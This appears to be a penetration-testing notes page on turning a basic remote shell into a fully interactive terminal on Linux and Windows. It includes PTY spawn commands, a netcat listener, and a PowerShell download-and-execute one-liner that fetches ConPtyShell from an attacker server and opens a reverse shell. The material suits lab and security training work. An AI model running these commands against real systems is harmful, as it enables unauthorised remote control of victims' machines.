PRIMARY CATEGORY → PENTESTING ROOT
| REFERENCES | |
|---|---|
| Upgrading Simple Shells to Fully Interactive TTYS | See here |
| ConPTYShell | See here |
| Introducing the Windows Pseudo Console (ConPTYShell) | See here |
Linux Terminal Upgrade
Once a connection is stablished from/to the Target, It is recommended to upgrade the Basic/Limited Shell obtained into a Fully Interactive TTY
Script
TTY/PTY Creation
script /dev/null -c bash # Spawn a Bash within a PTY ~ Pseudoterminal
C-z # SIGTSTP to background the previous Bash ProcessTTY/PTY Upgrade
Once a PTY i.e. a Pseudoterminal is generated, just proceed to upgrade it as follows →
Attacker 🗡️
stty raw -echo # Disable Terminal Input Processing and disable input's echo
fg # Foregrounds the Shell send to the background
reset xterm # Restore the Term to its default value while maintaining some Raw behaviourTarget 🎯
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows <NUMBER> columns <NUMBER>
. /etc/skel/.bashrc # Same as → source /etc/skel/.bashrcPython3
TTY/PTY Creation
python3 -c 'import pty ; pty.spawn("/bin/bash")' # Spawn a Bash within a PTYTTY/PTY Upgrade
Same as [[#script|Script]]
Windows Terminal Upgrade
Once a connection is stablished from/to the Target, It is recommended to upgrade the Basic/Limited Shell obtained into a Fully Interactive TTY
ConPtyShell
From the Attacker
- Set up a Simple HTTP Server to transfer the Powershell Module
python3 -m http.server <PORT>- In parallel, extract the size of rows and columns of the current terminal and set up a listening port
stty sizenc -nlvp 1234From the Target
- Request and Import the Powershell Module
IEX (New-Object Net.WebClient).downloadString('http://<TARGET>:<PORT>/Invoke-ConPtyShell.ps1')- Execute the function by passing it the following arguments
Invoke-ConPtyShell -RemoteIp <TARGET> -RemotePort <PORT> -Rows <ROWS> -Cols <COLUMNS>Once the reverse shell is received by the attacker, just proceed as follows
C-z
stty raw -echo ; fg
EnterMiscellaneous
Windows
CMD to Powershell
powershell.exe -File -